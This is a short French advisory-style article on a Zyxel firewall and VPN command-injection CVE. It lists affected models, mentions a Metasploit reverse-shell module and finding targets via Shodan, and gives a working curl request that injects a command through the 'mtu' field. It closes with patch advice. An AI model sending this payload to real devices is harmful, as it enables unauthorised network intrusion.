Zyxel est un fabricant taïwanais de commutateurs réseau, pare-feux et VPN.
Plusieurs de leur produits sont vulnérables à cette faille CVE.
Les modèles touchés sont les séries ATP et VPN, les modèles USG 100(W), 200, 500, 700 et Flex 50(W)/USG20(W)-VPN.
Les versions de firmware vont de la version 5.00 à la version 5.21 Patch 1.
Cette attaque dispose déjà d’un module Metasploit permettant d’avoir un reverse shell au sein de votre réseau.
Exemple d'attaque sur la faille CVE Zyxel
La liste des équipements ciblés est relativement populaire. Environ 16600 dans le monde et 3100 en France. On peut d ailleurs facilement en trouver grâce à SHODAN.
Alors l’attaque déjà se fait via une injection de commande de manière anonyme direct dans l’interface web en passant par l’url /ztp/cgi-bin/handler.
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler
Ici on est gentil on fait un simple ping mais vous pourriez très bien mettre en place un reverse shell et la bienvenue dans le réseau.
Zyxel CVE comment vous en protéger?
Zyxel a mis a disposition un patch qui permet de fixer la vulnérabilité, vous devez donc mettre à jour vos équipements.